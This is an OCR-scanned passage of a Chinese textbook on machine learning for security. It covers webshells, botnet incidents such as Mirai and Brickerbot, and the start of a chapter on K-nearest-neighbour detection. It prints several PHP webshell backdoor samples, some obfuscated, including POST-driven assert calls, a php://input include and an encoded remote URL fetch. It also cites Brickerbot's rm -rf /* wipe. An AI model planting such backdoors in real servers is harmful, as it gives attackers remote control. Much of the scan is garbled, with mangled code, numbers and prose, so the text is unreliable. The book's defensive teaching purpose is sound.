wooyun-2016-0179480 2016-02-29 ChinaUnix 博 客 -专业 IT 技术 博客 被 入 侵 发 现 webshell 

wooyun-2016-0179072 2016-02-27 中 国 移动 和 阅读 某 站 因 目 录 遍 历 发 现 已 经 沦陷 (多 个 webshell) 
wooyun-2016-0179065 ^ 2016-02-27 完美 世界 某 服务 器 被 植 入 WEBSHELL 

wooyun-2016-0177184 ^ 2016-02-20 浪潮 集团 某 系 统 上 传 漏洞 获得 webshell( 包 含 大 量 数据 库 连接 密码 \ 各 地 系统 连接 信息 ) 
wooyun-2016-0175346 2016-02-10 上 海 市 通讯 管理 局 某 系统 文件 上 传 漏洞 获得 webshell 并 可 以 内 网 漫游 
wooyun-2016-0174747 ^ 2016-02-04 网 站 安全 狗 WebShell 上 传 拦截 绕 过 

wooyun-2016-0174395 ^ 2016-02-02 让 我 来 告诉 你 最 新 版 安全 狗 是 如 何 拦截 webshell 的 





图 4-14 20165 z WebShell 3 4} 


黑客 通过 Webshell 可 以 达到 长 期 控制 被 害 服务 器 的 目的 ， 并 且 可 以 通过 Webshell 进 一 步 渗透 。 






Attackers took advantage of weak 

Attackers took advantage of weak controls within Target's network and 
security at a Target vendor, gaining a successfully maneuvered into the 
foothold in Target's inner network. network's most sensitive areas. 


ommanc¢ 
eaponize & 
Control 


Target missed information provided by its 
anti-intrusion software about the attackers' 
















Target missed warnings from its anti- 
intrusion software that attackers were 
installing malware in its network. 





escape plan, allowing attackers to steal as 
many ad 110 million customer records. 





图 4-15 KILLCHAIN 


在 KILLCHAIN 模 型 中 ( 见 图 4-15) ，Webshell 属 于 command&control 环 节 ， 换 句 话 说 一 旦 系统 被 安装 Webshell 并 能 执行 ， 说 明 系 统 已 经 沦陷 ， 属 于 高 危 安 全 事件 。 





简单 总 结 一 下 ，Webshell 通 常 具备 以 下 功能 ( 见 图 4-16) : 
.环境 探 针 ; 


“ 资源 管理 ; 


* 文件 编辑 ; 


- 创建 Socket; 


调用 系统 组 件 。 





casel: 


<?php 


$M-$ POST[ice]; 
IF(SM--2NuLl)HeaDeR('Status:404'!'); 
Else/**/SK(SM); 








?> 


Gre: O° xig | ar vem ©) 02€ 3 


xdmin/Databackup/web. asp 


地 址 (D) | 48) http: A 


提 权 目录 列表 : Program 
[Temp] [Documents 
Hitt : 


T 


osa 

9:5 515 B 

O27 EF 

OHER 

LU aus 

O Liri 

全 文件 夹 打 包 - 解 包 

上 -服务 回信 息 

@@ 查 看 可 写 目录 
系统 服务 -用 户 账 号 

全 主机 信息 -组 件 支 持 

eu ges 

ei xA 

ee 

O1eHS 

LEUR 4: E 

iUt t2. 

62:51 

eats 

+ - 近 权 相关 

Oth 77Cmdaa> 

OmOnRS 

OMe ti 


case2: 


<?php 


ers] 『 开 始 > HAJ PRECYCLED] ff; 





Anywhere Fserv-ull [e 


服务 器 组 件 信息 


tapesales.net 


mm | 


服务 器 时 间 
服务 器 CPU 数量 
CETT 


WE BARS SIE Microsoft-IIS/6.0 


Scripting.FileSystemOb ject 


wscript.shell 
ADOX.Catalog 
JRO. Jet Engine 
Scripting.Dictionary 
Adodb.connection 


Adodb.Stream 


SottArtisans.FileUp 
LyfUpload.UploadFile 


Persits.Upload.1 
JNMail.Smf+pNWail 
CDONTS,Newail 
Smtpikail Smtp/ail.1 
Microsott XMLHTTP 


图 4-16 ”功能 完善 的 WebShell 


2009-8-20 12:33:14 


$qajd2="VDFOVVd5"; $vvnr1="UUdWM1ç1X"; $hitq5="d29KRj1R"; $itfh2="ZGtabmg2Y1RRblhTazc=";// dfxzq4 








Sakmi4 


str replace ("eu2","","eu2seu2teu2reu2 reu2eeu2pleu2aeu2ce");// ulgp9 
Shygg4 


Sakmi4("so0", "", "So0baso0sso0e6so04so0 so0dso0eso0cso00so0dso0e"); // qbhml 





Server] PSQLY Peonfiod Pdatad 


[a] 





Sakmi4 ("qik6","" lone ud tom 











case3: 


// php://input based backdoor 


$gzsw5('', Shygg4 (Shygg4 (Sakmi4 ("$; *, ." 


fgik6uncqik6tqik6ioqik6n"); // kfcs6 





p 5". Svvnrl.S$Shitq5.$qajd2.$itfh2)))); Sfoxl60; 


// uses include('php://input') to execute arbritary code 
// Any valid PHP code sent as raw POST data to backdoor is ran 
:) 








// overrides the php.ini settings using ini set 
// Insecurety Research 2013 | insecurety.net 
<?php 














ini set('allow url include, 1'); // Allow url inclusion in this script 
// No eval() calls, no system() calls, nothing normally seen as malicious. 


include ('php://input") ; 
?» 


case4: 


«?php e$ -"s" . "gn ] /*- 
MIL ML P lll llllddHl 


Wes te ute he pda coe es Hr eem gf apy MEM de: Jeter (oy ec ten AD TD, reges MOS ag seem e yer 


HIM M T GG 


HoH 0 / [4 [= [8 [8 [2 m p [I [8— [n [Sp P2 ) 72> 


case5: 


<?php 
Sitem['wind'] = 'assert'; 
Sarray[] = Sitem; 
Sarray[0]['wind']($ POST['hkwwj']); 
P 


case6: 


«?php 
session start(); 
ini set('memory limit',-1); 
$i = pack('c*', 0x70, 0x61, 99, 107); 
SGLOBALS - array( 
'p' => pack('c*', 0x70, 0x61, 99, 107), 











tal => Si('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 11 





LEY => oA 














"h' => Si 











) 7 





























( 
'e' => $4 (e * 0x63, 0x72, 0x65, 0x61, 0x74, 0x65; 0x5£; 0x66, 0x75, RBS 0x63, 0x7 
('H*', '687474703a2f2f626c61l16b696e2e64756170702e636f6d2f7631'), 
's' =>$i('c*', 0x73, 0x70, 0x72, 0x69, 0x6e, 0x74, 0x66) 











07 :99) 





"ex", 102, 105, 108, 101, 95, 103, 101; 116, 95, 99, 111, 110, 





li6, 101, 110, llo, 115); 









































if (!isset($ SESSION['t'])){$ SESSION['t'] = SGLOI 
SGLOBALS['c'] (SGLOBALS['e'] (null, SGLOBALS['s'] ('$s 
> 

case7: 

«?php 


BALS['f' ] (SGLOBALS ["h 
"H 





4,0x69, Ox6f ,0x6e), 





', SGLOBALS['p'] ( 








$ SESSION['t'1)))); 








$w-'Do0; $Doi«$1; Do) {for ($j=0; ($Doj<$cDo&&$i<$1) ;$j++Do, Do$it+) ($0. DoDo-$t {$i}*Do$k{$j};}Do}retDourn $0; )$r-Do$ Sl 


$y-str replace('km','','crkmekmate kmkmfukmkmnction'); 
t=' (Se) Do{S$k=SkhDo.$kf;ob sDotDoart () ; @eDoval (@gzDo 
b=! Skh="63D0a9"Do; SkfDo-"f0eaDo" ; fuDoncDotion x ($t, $kDo) {$c=strlen ($kDo) 
f-'ay("/Do /","Do/-/") ,aDorrayDo ("/","+"Do) ,$ss ($s[$Doi],0,DoDo$e))Do),$k))) 
if( 





























H-']Do* (Do? : ;Doq-0. ([NNd]) ) ?, ?/", $ra, DoDoSm) ; 
I-'sl-Do"sDotrtDoolower";S$i-S$mDo [Do1] [0] .$m[1] 


An AD AD rin 
( 
































$A-'Do, 3) ) Do; $p="Do"; Dofor ($z=1; $Doz<cDoount ($m 








$M=' {Do$s [$i]=""; $Dop=$ss ($pDo, 3); }if 





— 





Sq&Do&$m) (8seDossDoionDoDo s 














ER'; 


uDoncomDopress (Do8x (@bDoase64Do_ decode (preg replaDoce (aDoDorr'; 
;$1Do=strlen (Do$t);S$0o-Do""; fDoor ($iDo-'; 


;So-ob get DoconteDonDots ();ob endDo cle'; 























Iis 








arDoray kDoey existDos ($i, $DoDos)) ($Dos 





$Q-str replace('Do','',S$b.S$w.SK.S$a.S$H.S$I.$A. $M. $t. $S£.$9); 





SP=Sy("', $Q); $PO ; 
?» 


44 僵尸 网 络 概述 











[$Doz]Do]; 


一 











| start () ;$s=&$ DoSESSIODONDo; $ss="substr"; $Do' 
[1]; $Doh-$s1 ($Doss (mdDo5 ($i.SkDoh) , 0, 3Do) ) ; SDo£Do-$s1 ($ss (md5 (DoDo$i .$kf 
SK-'VEDOR; $rrDo=@$r [Do"HTTDoP_REFERDOER"] ; $rDoaDoDo=@$Dor ["HTTP_ DoACCEPDoT LANGUADOGE"]; 
Sa='e url($rr);paDorse str ($Dou["querDoy"Do] Do, $q) ; S$Dog=array DoDovaDolues ($q) ; o Doma! 
[Do1] DoDo) ; Do$z++) $p.=$q[$m[2] 
SS='an () Do; $d=baDoseDo64 encoDode (x (oO es (66) Bobo Desk) | sprint [" «3k o Sio) 





f ($rr&&SraDo) Do(SDou-Dopars'; 
tch all(Do"/([NNw]) [NNw-' ; 
strpos ($DoDop, $h) ===0) Do' ; 

7@session deDostroy (Do) 





[$i] .-Do$p; $e=strpDoos ($s [Do$i], $f) 








EDo' s 





r 


),0'; 


PIRE 


; Doi 


僵尸 网 络 (Botnet) 是 指 采用 一 种 或 多 种 传播 手段 ， 使 大 量 主机 感染 bot 程 序 (僵尸 程序 ) 病毒 ， 从 而 在 控制 者 和 被 感染 主机 之 间 所 形成 的 一 个 可 一 对 多 控制 的 网 络 ， 


传播 僵尸 程序 感染 互联 网 上 的 大 量 主机 ， 而 被 感染 的 主机 通 


过 一 个 控制 信道 接收 攻击 者 的 指令 


组 成 一 个 僵尸 网 络 。 之 所 以 用 僵尸 网 络 这 


算 机 在 不 知 不 觉 中 如 同 中 国 古 老 传说 中 的 僵尸 群 一 样 被 人 驱赶 和 指挥 着 ， 成 为 被 人 利用 的 一 种 工具 。 


个 名 字 


， 是 为 了 更 形象 地 让 人 们 认识 


见 图 4-17。 攻 击 者 通 


到 这 


文 类 危害 的 特点 : 


甬 过 各 种 途径 


众多 的 计 





图 4-17 r A% 


僵尸 网 络 是 互联 网 上 受到 黑客 集中 控制 的 一 群 计算 机 ， 往 往 被 黑客 用 来 发 起 大 规模 的 网 络 攻击 ， 如 分 布 式 拒绝 服务 攻击 (DDoS) 、 海 量 垃圾 邮件 等 ， 同 时 黑客 控制 的 这 些 计 算 机 所 保存 的 信息 ， 辟 如 
银行 帐户 的 密码 与 社会 安全 号 码 等 也 都 可 被 黑客 随意 “DAA. 因此， 不 论 是 对 网 络 安全 运行 还 是 对 用 户 数据 安全 的 保护 来 说 ， 僵 尸 网 络 都 是 极 具 威 胁 的 隐患 。 僵 尸 网 络 的 威胁 也 因此 成 为 目前 国际 上 十 分 
关注 的 一 个 问题 。 然 而 ， 发 现 一 个 僵尸 网 络 是 非常 困难 的 ， 因 为 黑客 通常 远程 、 隐 蔽 地 控制 分 散在 网 络 上 的 “僵尸 主机 ”， 这 些 主机 的 用 户 往往 并 不 知情 。 因 此 ， 人 僵尸 网 络 是 目前 互联 网 上 黑客 最 青睐 的 作 
STE. 


MAS, BRE "EPRS DIA. MSCS. KARRAR, MERS ENR. (SSE, Abeer, RR WRG, SHARMA 
载 有 问题 的 软件 。 一 旦 这 种 有 毒 的 软件 进入 到 网 友 电 脑 ， 远 端 主机 就 可 以 发 号 施 令 ， 对 电脑 进行 操控 。 下 载 时 只 用 一 种 杀毒 软件 查 不 出 来 。 


专家 表示 ， 每 周平 均 新 增 数 十 万 台 任 人 遥控 的 僵尸 电脑 ， 任 任远 端 主机 指挥 ， 进 行 各 种 不 法 活动 。 多 数 时 候 ， 僵 尸 电脑 的 主人 根本 不 晓得 自己 已 被 选中 ， 任 人 摆布 。 


僵尸 网 络 之 所 以 出 现 ， 在 家 高 速 上 网 越 来 越 普遍 也 是 原因 之 一 。 高 速 上 网 可 以 处 理 (或 制造 ) 更 多 的 流量 ， 但 高 速 上 网 家 庭 习惯 将 电脑 长 时 间 开 机 ， 唯 有 电脑 开机 ， 远 端 主机 才 可 以 对 僵尸 电脑 发 号 施 


4 
Mo 


网 络 专家 称 : “重要 的 硬件 设施 虽然 非常 重视 杀毒 、 防 黑客 ， 但 网 络 真正 的 安全 漏洞 往往 来 自 于 用 户 ， 这 些 个 体 用 户 缺乏 自我 保护 的 知识 ， 让 网 络 充满 地 雷 ， 进 而 对 其 他 用 户 构成 威胁 。” 


4.4.1 ”僵尸 网 络 的 危害 


1. 拒 绝 服 务 攻击 


使 用 Botnet 发 动 DDoS 攻 击 是 当前 最 主要 的 威胁 之 一 ， 攻 击 者 可 以 向 自己 控制 的 所 有 bot 发 送 指令 ， 让 它们 在 特定 的 时 间 同 时 开始 连续 访问 特定 的 网 络 目 标 ， 从 而 达到 DDos 的 目的 。 由 于 Botnet 可 以 形 
成 庞大 规模 ， 而 且 利用 其 进行 DDos 攻 击 可 以 更 好 地 同步 ， 所 以 在 发 布控 制 指令 时 ， 能 够 使 DDos 的 危害 更 大 ， 防 学 更 难 。 


2. 发 送 垃圾 邮件 
一 些 bot 会 设立 sockv4、v5 代 理 ， 这 样 就 可 以 利用 Botnet 发 送 大量 的 垃圾 邮件 ， 而 且 发 送 者 可 以 很 好 地 隐藏 自身 的 |P 信 息 。 


3. £3 BUR 


Bi 


Botnet 的 控制 者 可 以 从 僵尸 主机 中 窃取 用 户 的 各 种 敏感 信息 和 其 他 秘密 ， 例 如 个 人 账号 、 机 密 数据 等 。 同 时 bot 程 序 能 够 使 用 sniffer 观 测 感 兴 趣 的 网 络 数据 ， 从 而 获得 网 络 流量 中 的 秘 
4. 滥 用 资源 


攻击 者 利用 Botnet 从 事 各 种 需要 耗费 网 络 资 源 的 活动 ， 从 而 使 用 户 的 网 络 性 能 受到 影响 ， 甚 至 带 来 经 济 损失 。 例 如 : 种 植 广告 软件 ， 点 击 指定 的 网 站 ; 利用 僵尸 主机 的 资源 存储 大 型 数据 和 违法 数据 
等 ， 利 用 僵尸 主机 搭建 假冒 的 银行 网 站 从 事 网 络 钓 鱼 的 非法 活动 。 


可 以 看 出 ，Botnet 无 论 是 对 整个 网 络 还 是 对 用 户 自 身 ， 都 造成 了 比较 严重 的 危害 ， 我 们 要 采取 有 效 的 方法 减少 Botnet 的 危害 。 
5. 僵 尸 网 络 挖 矿 


网 络 安全 商 fortiguard labs 的 网 络 安全 研究 报告 指出 ， 虚 拟 货 币 的 僵尸 挖 矿 ZeroAccess 已 经 成 为 全 球 网 络 当 下 的 主要 威胁 。ZeroAccess 的 主要 攻击 手段 是 click fraud 和 virtual mining， 通 过 控制 大 量 
僵尸 主机 进行 挖 矿 活动 ， 近 期 由 于 比特 币 等 虚拟 货币 的 价值 问 升 ， ZeroAccess 的 获 利 可 能 超 平 想象 。 


44.2 近年 典型 僵尸 网 络 攻击 事件 分 析 


1.Mirai 伪 尸 网 络 

2016 年 ， 美 国 域名 解析 服务 提供 商 Dyn 公 司 遭 到 了 峰值 达 1.1Tbps 的 DDoS 攻击 ， 造 成 了 美国 东部 大 面积 的 网 络 准 病 ， 包 括 Twitter、Facebook 在 内 的 多 家 美国 网 站 无 法 通过 域名 访问 。 而 造成 半 个 美国 
互联 网 瘫痪 的 罪魁 祸首 ， 则 是 Mirai 伪 尸 网 络 控 制 下 的 数 以 10 万 计 的 物 联网 设备 。Mirai 恶 意 程序 通过 扫描 物 联 网 设备 ， 尝 试 默认 通用 密码 进行 登录 操作 ， 一 旦 成 功 即 将 这 台 物 联网 设备 作为 “肉鸡 ”纳入 伪 
尸 网 络 中 ， 进 而 操控 其 攻击 其 他 网 络 设备 。 

同年 ， 德 国电 信也 遭遇 了 一 次 大 范围 的 网 络 故 障 。 在 这 次 故障 中 ，2000 万 固定 网 络 用 户 中 的 大 约 90 万 个 路 由 器 发 生 故 障 ( 约 4.5%) ， 并 由 此 导致 大 面积 网 络 访问 受 限 。 很 多 媒体 给 出 了 网 络 受 限 的 示意 
图 ， 如 图 4-18 所 示 。 


ILES 


eL 









FS) fe Svizzera, Svizrac - 
E Vl ey we 





图 4-18 德国 电信 遭遇 Mitai 攻 击 


德国 电信 进一步 确认 了 问题 是 由 于 路 由 设备 的 维护 界面 被 暴露 在 互联 网 上 ， 并 且 互 联网 上 正在 发 生 针 对 性 的 攻击 而 导致 。 德 国电 信 连 夜 与 设备 供应 商 生 成 了 新 的 升级 包 ， 并 且 要 求 客 户 如 果 怀 疑 受 到 影 
响 就 断 电 重启 路 由 器 ， 之 后 利用 自动 /手动 的 升级 过 程 来 解决 问题 。 德 国电 信 还 采取 了 一 系列 的 过 滤 措 施 来 保证 升级 过 程 不 受 攻击 影响 。 


2.Leet(& P WA 


IMPERVA 最 新 的 《全 球 DDos 威 胁 态势 季度 报告 》 中 披露 ， 随 着 网 络 层 攻击 规模 的 加 大 ， 应 用 层 安全 事件 发 生 频 率 也 上 升 了 。2016 年 第 4 季度 IMPERVA 缓 解 的 最 大 型 DDoS 攻击 ， 规 模 为 650Gbps (Ui 
图 4-19) ， 是 依托 Leet 僵 尸 网 络 发 起 的 (之 前 的 第 3 季度 中 ， 阿 卡 迈 处 理 了 类 似 的 攻击 ， 是 Mirai 僵 尸 网 络 驱动 的 ) 。2016 年 最 后 3 个 月 还 见证 了 该 年 度 最 持久 的 网 络 层 攻击 一 一 持续 了 29 天 。 
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图 4-19 ”Leet 僵 尸 网 络 发 起 的 DDoS 攻击 
3.Amnesia(& A Ky% 


Amnesia 僵 尸 网 络 利 用 了 未 修补 的 远程 代码 执行 漏洞 ， 这 个 漏洞 一 年 多 之 前 由 安全 研究 员 Rotem Kerner 发 现 。Amnesia 僵 尸 网 络 目标 是 嵌入 式 系统 ， 尤 其 是 中 国 的 某 广 商 生产 的 DVR (数字 视频 录像 
机 ) , 目前, 该 公司 名 下 有 70 多 个 品牌 的 产品 销 往 世 界 各 地 。 


2016 年 3 月 ，Kerner 将 其 发 现 的 漏洞 上 报 了 DVR 厂 商 ， 但 是 未 得 到 任何 回应 ， 一 年 后 ， 他 决定 公布 漏洞 细节 。 
根据 Palo Alto Networks (PAN) 研究 人 员 的 相关 分 析 ，Amnesia 是 Tsunami 伪 尸 网 络 的 变种 ，Tsunami 作 为 一 种 下 载 程序 /IRC 伪 尸 程 序 后 门 ， 被 网 络 犯罪 分 子 利 用 来 发 动 DDoS 攻 击 。 


根据 PAN 的 网 络 扫 描 结果 ， 上 述 漏洞 仍 未 修补 ， 全 球 大 约 有 22.7 万 DVR 设 备 受 此 漏洞 影响 ( 见 图 4-20) 。 





图 4-20 ”Amnesia 僵 尸 网 络 


Amnesia 僵 尸 网 络 利用 的 是 远程 代码 执行 漏洞 ， 攻 击 者 可 利用 该 漏洞 完全 控制 设备 。 
专家 认为 ， 由 于 采用 逃避 技术 ，Amnesia 伪 尸 网 络 极 为 复杂 。 恶 意 软件 研究 人 员 认 为 Amnesia 伪 尸 网 络 是 第 一 款 采 用 虚拟 机 逃避 技术 来 逃避 恶意 软件 分 析 沙 箱 的 Linux 物 联网 恶意 软件 。 
4.Brickerbot 僵 尸 网 络 


2017 年 ，Radware 研 究 人 员 发 现 了 一 种 新 的 僵尸 网 络 。 这 种 僵尸 网 络 和 Mirai 僵 尸 网 络 有 诸多 相似 之 处 ， 被 命名 为 Brickerbot。Mirai 僵 尸 网 络 和 Brickerbot 的 主要 区 别 在 于 ， 后 者 的 恶意 软件 可 对 配置 
不 当 的 物 联网 设备 造成 永久 性 破坏 。Radware 公 司 为 进行 恶意 软件 分 析 而 部 署 了 密 钠 ，Brickerbot 对 其 发 起 攻击 ， 进 而 被 友 现 。 通 过 部 署 有 针对 性 的 蜜 钠 服 务 器 发 现 检 测 到 来 自 全 球 1895 个 IP 的 BrickerBot 
攻击 尝试 ( 见 图 4-21) ， 而 且 还 发 现 了 333 次 通过 Tor 的 网 络 攻 击 尝试 。 


Brickerbot 僵 尸 网 络 通过 Telnet 暴 力 攻击 物 联网 设备 。Mirai 僵 尸 网 络 也 曾 采 用 此 技术 。Bricker 很 难 分 析 ， 因 为 它 并 不 下 载 二 进 制 ， 这 意味 着 Radware 专 家 无 法 检索 恶意 软件 暴力 使 用 的 完整 凭据 清单 。 
恶意 软件 研究 人 员 只 能 观察 到 第 一 次 登录 的 用 户 名 /密码 是 root/vizxv。 专 家 解释 说， 恶意 软件 针对 的 是 运行 在 BusyBox 上 、 基 于 Linux 的 物 联 网 设备 。 这 些 设 备 Telnet 端 口 都 是 开放 的 ， 并 且 暴 露 在 互联 网 


上 。DDos 攻 击 源 于 有 限 数量 的 I|P 地 址 。 被 攻击 设备 都 是 端口 为 22 和 运行 老 版 本 Dropbear SsH 服 务 的 设备 。 大 部 分 被 僵尸 网 络 攻击 的 设备 被 Shodan 识 别 为 Ubiquiti。 恶 意 代 码 首 先 获得 对 设备 的 访问 ， 然 


后 通过 rm-rf/* 命 令 擦 除 设备 内 存 ， 禁 用 TCP 时 间 戳 ， 并 将 内 核 线程 的 最 大 数量 限制 为 一 个 。 


Brickerbot 恶 意 软件 刷新 所 有 iptables 防 火 墙 和 和 NAT 规则 ( 见 图 4-22) ， 并 添加 一 条 规则 来 删除 所 有 传 出 的 数据 包 。Brickerbot 试 图 擦 除 受 影响 物 联网 设备 上 的 所 有 代码 ， 使 其 不 可 用 。 
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图 4-21  Brickerbot4& ^ p] 2% 
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图 4-22 ”Brickerbot 恶 意 软件 刷新 所 有 iptables 防 火 墙 和 NAT 规 则 


4.5 “本章 小 结 


本 章 概 述 了 Web 安 全 中 常见 的 XSS、SQL 注 入 、WebShel 以 及 僵尸 网 络 ， 杭 理 了 其 相关 的 概念 


章节 我 们 将 开启 机 器 学 习 的 算法 之 旅 。 


参考 资源 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 


欢迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 


常见 攻击 特征 以 及 近年 相关 安全 事件 ， 相 信 仔 细 看 过 的 读者 已 经 达到 了 温 故 而 知 新 的 效果 了 ， 后 面 


- http://blog.csdn.net/lizhengnanhua/atticle/details/9061755 

- http://netsecutity.51cto.com/art/201702/531237.htm 

: http://special.csdncms.csdn.net/security / 

: https://www.lvtao.net 

: http://zt.360.cn 

: http://www.jsfuck.com/ 

: http://www.freebuf.com/vuls/108611.html 

: http://www.freebuf.com/vuls/124864.html 

: http://toutiao.secjia.com/three-new-iot-botnet-after-mirai 

: https://github.com/wtsxDev /Machine-Learning-for-Cyber-Secutity / blob 
: https:/ /www leiphone.com/news/201509/YfCBVNy7Ouc2axf.html 
: http://blog.csdn.net/zhenyu5211314/article/details/21941193 


还 可 以 参考 吴 翰 清 的 著作 《和 白 帽 子 讲 Web 安 全 》。 


第 5 章 Kk 近邻 算法 


民 近 邻 算法 是 我 们 介绍 的 第 一 个 机 器 学 习 算 法 ， 同 时 它 也 是 机 器 学 习 领 域 大 名 章光 的 分 类 算法 之 一 ， 虽 然 它 原 理 非 常 简单 ， 但 是 在 非常 多 的 领域 有 着 广泛 的 应 用 。 本 章 将 介绍 区 近邻 算法 的 基本 概念 ， 并 
给 出 基本 的 使 用 方式 ， 介 绍 如 何 使 用 开 近 邻 基 于 不 同 的 特征 提取 方式 来 检测 异常 操作 ， 如 何 使 用 区 近邻 检测 Rootkit， 如 何 使 用 区 近邻 检测 WebShell 等 。 


“ 橘 生 淮南 则 为 桶 ， 生 于 淮北 则 为 可 ” 出 自 《 晏 子 春秋 :内 篇 杂 下 》。 原文 为 “ 橘 生 淮 南 则 为 橘 ， 生 于 淮北 则 为 可 ， 叶 徒 相 似 ， 其 实 味 不 同 。 所 以 然 者 何 ” 水 土 异 也 。 ”完整 的 典故 是 : 齐 国 的 晏子 出 使 
楚 国 ， 梦 王 想 戏弄 他 ， 故 意 将 一 个 犯人 从 堂 下 押 过 。 楚 王 问 : 此 人 犯 了 什么 罪 ? 回答 : 一 个 齐 国 人 犯 了 偷窃 罪 。 楚 王 就 对 晏子 说 ， 你 们 齐 国 人 是 不 是 都 很 喜欢 偷 东西 ” 边 子 回答 : 淮南 有 橘 又 大 又 甜 ， 一 移 
栽 到 淮北 ， 就 变 成 了 可 ， 又 酸 又 小 ， 为 什么 呢 ?” 因 为 土壤 不 同 ( 见 图 5-1) 。 





图 5-1 BPRS 


同样 的 道理 ， 我 们 可 以 理解 距离 接近 的 事物 具有 相同 属性 的 可 能 性 要 大 于 距离 相对 较 远 的 ， 这 个 也 是 K 近 邻 算 法 的 核心 思想 。 


KEB (K-Nearest Neighbor, KNN) 算法 是 机 器 学 习 领 域 使 用 最 广泛 的 算法 之 一 ， 所 谓 KNN， 就 是 K 个 最 近 的 邻居 的 意思 ， 说 的 是 每 个 样本 都 可 以 用 它 最 接近 的 K 个 邻居 来 代表 。KNN 算 法 的 核心 思 
想 是 : 如 果 一 个 样本 在 特征 空间 中 的 K 个 最 相 邻 的 样本 中 的 大 多 数 属 于 某 一 个 类 别 ， 则 该 样本 也 属于 这 个 类 别 ， 并 具有 这 个 类 别 上 样本 的 特性 ，KNN 原 理 如 图 5-2 所 示 。 该 方法 在 确定 分 类 决策 时 ， 只 依据 最 
邻近 的 一 个 或 者 几 个 样本 的 类 别 来 决定 待 分 样本 所 属 的 类 别 。KNN 方 法 在 类 别 决策 时 ， 只 与 极 少 量 的 相 邻 样本 有 关 。 由 于 KNN 方 法 主要 靠 周围 有 限 的 邻近 的 样本 ， 而 不 是 靠 判 别 类 域 的 方法 来 确定 所 属 类 
别 ， 因 此 对 于 类 域 交 叉 或 重 苹 较 多 的 待 分 样本 集 来 说 ，KNNN 方 法 较 其 他 方法 更 为 适合 。 





图 5-2 KNN 原 理 图 


KNN 常 用 的 算法 为 : 
: Brute Force; 
: K-D Tree; 


- Ball Tree. 


5.2 示例 : hello world! KESB 


我 们 先 演示 一 下 K 近 邻 的 基础 用 法 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 5-1.py。 


用 Ball Tree 算 法 举 个 简单 的 例子 ， 其 他 算法 类 似 ， 不 再 袭 述 。 训 练 数据 集合 是 二 维 平面 上 的 若干 个 点 : 





>>> X= np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 211) 


调用 Scikit-Learn 的 KNN 算 法 ， 邻 居 数 设置 为 2， 进 行 训练 : 











>>> from sklearn.neighbors import NearestNeighbors 
>>> import numpy as np 

>>> X= np.array([[-1, -Ill, [-2, -L]; [-3, =li [1, 1], [2, 1]; [35 2]]) 
>>> nbrs = NearestNeighbors (n neighbors-2, algorithm-'ball tree').fit(X) 








计算 结果 为 : 





>>> distances, indices = nbrs.kneighbors (X) 

>>> indices 

array([[O, 1] 
[1, 0] 
[2, 1] 
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[3, 4], 
[4, 3], 
[5, 4]]) 
>>> distances 
array([[ 0. iF 
[ O. js 
[i “Os, 41421356], 
[ 0. ]; 
[ O. Jy 
[ O. 41421356]]) 
可 视 化 结果 为 : 
>>> nbrs.kneighbors graph (X) .toarray () 
array (|| dey day “Oey Oep Our ^ OL]. 
[3 spo Ue UU UO 
E 0., i4 dux "Ou, Deg 0l]. 
DO, Oey. ‘OQ Ley Lz OT, 
[,O Qi, 0 1., Üs], 
[ 0. Q 0 Dus 1.11) 








KNN 用 于 监督 学 习 也 非常 简单 ， 如 下 所 示 : 





>>> X — [[0], [1], [2], [3]] 

>>> y = [0, 0, 1, 1] 

>>> from sklearn.neighbors import KNeighborsClassifier 
>>> neigh = KNeighborsClassifier (n neighbors=3) 

>>> neigh.fit(X, y) E 
KNeighborsClassifier (http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...) 
>>> print (neigh.predict ([[1.1]])) 

[0] 
>>> print(neigh.predict proba([[0.9]])) 
[[ 0.66666667 0.33333333]] 



























































5.3. aN: GEARS A ase EE (一 ) 

黑客 入 侵 Web 服 务 器 以 后 ， 通 常会 通过 系统 漏洞 进一步 提 权 ， 获 得 root 权 限 。 我 们 试图 通过 搜集 Linux 服 务 器 的 bash 操 作 日 志 ， 通 过 训练 识别 出 特定 用 户 的 操作 习惯 ， 然 后 进一步 识别 出 异常 操作 行 
为 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 5-2.py。 

1. 数 据 搜集 和 数据 清洗 

Schonlau 在 他 的 个 人 网 站 : http://www.schonlau.net/ 上 发 布 了 针对 Linux 操 作 的 训练 数据 ( 见 图 5-3) 。 


€ C | © www.schonlau.net 





Home 


Masquerading User Data 


Publications 


We have collected a data set with seeded masquerading users to compare various intrusion 
Book on Web detection methods. The data set is available here . 


Surve 
a The data consist of 50 files corresponding to one user each. Each file contains 15,000 commands 


(audit data generated with acct). The first 5000 commands for each user do not contain any 
masqueraders and are intended as training data. The next 10,000 commands can be thought of as 
100 blocks of 100 commands each. They are seeded with masquerading users, i.e. with data of 
Teaching another user not among the 50 users. 

At any given block after the initial 5000 commands a masquerade starts with a probability of 196. If 
Stata Software the previous block was a masquerade, the next block will also be a masquerade with a probability of 
80%. About 5% of the test data contain masquerades. 


Students 


Masquerading 


U Dat This data set is used in an article in Statistical Science (see publications on the left). For further 
ser Data 


information please consult this article or contact me. 


Space (Software) e Masquerade Data (zip File) Uncompress using WinZip. 
Masquerade Data (Unix) uncompress (gunzip), and de-tar (tar -x) the data set. 
Finishing a Ph.D This contains 50 files, one each for 50 users. Each file contains 15000 lines. Each line has one 
at command. 


e Location of masquerades (Win ii fi 


图 5-3” ”Schonlau 个 人 网 站 





训练 数据 中 包括 50 个 用 户 的 操作 日 志 ( 见 图 5-4) ， 每 个 日 志 包含 15000 条 操作 命令 ， 其 中 前 5000 条 都 是 正常 操作 ， 后 面 的 10000 条 日 志 中 随机 包含 有 异常 操作 。 为 了 便于 分 析 ， 数 据 集 每 100 条 操作 作 
为 一 个 操作 序列 ， 同 时 进行 了 标注 ， 每 个 操作 序列 只 要 有 1 条 操作 异常 就 认为 这 个 操作 序列 异常 ( 见 图 5-5) 。 


User2 

User2@ 
User2l 
User22 
User23 


User24 
User25 
User26 
User2/ 
User28& 
User29 


其 中 以 用 户 名 作为 文件 名 ， 每 个 用 户 的 操作 都 记录 在 对 应 的 文件 里 面 。 


每 个 文件 中 ， 按 照 操作 顺序 依次 记录 了 操作 命令 。 


User3 

User3@ 
User31 
User32 
User33 
User34 
User35 
User36 
User3/ 
User38& 
User39 


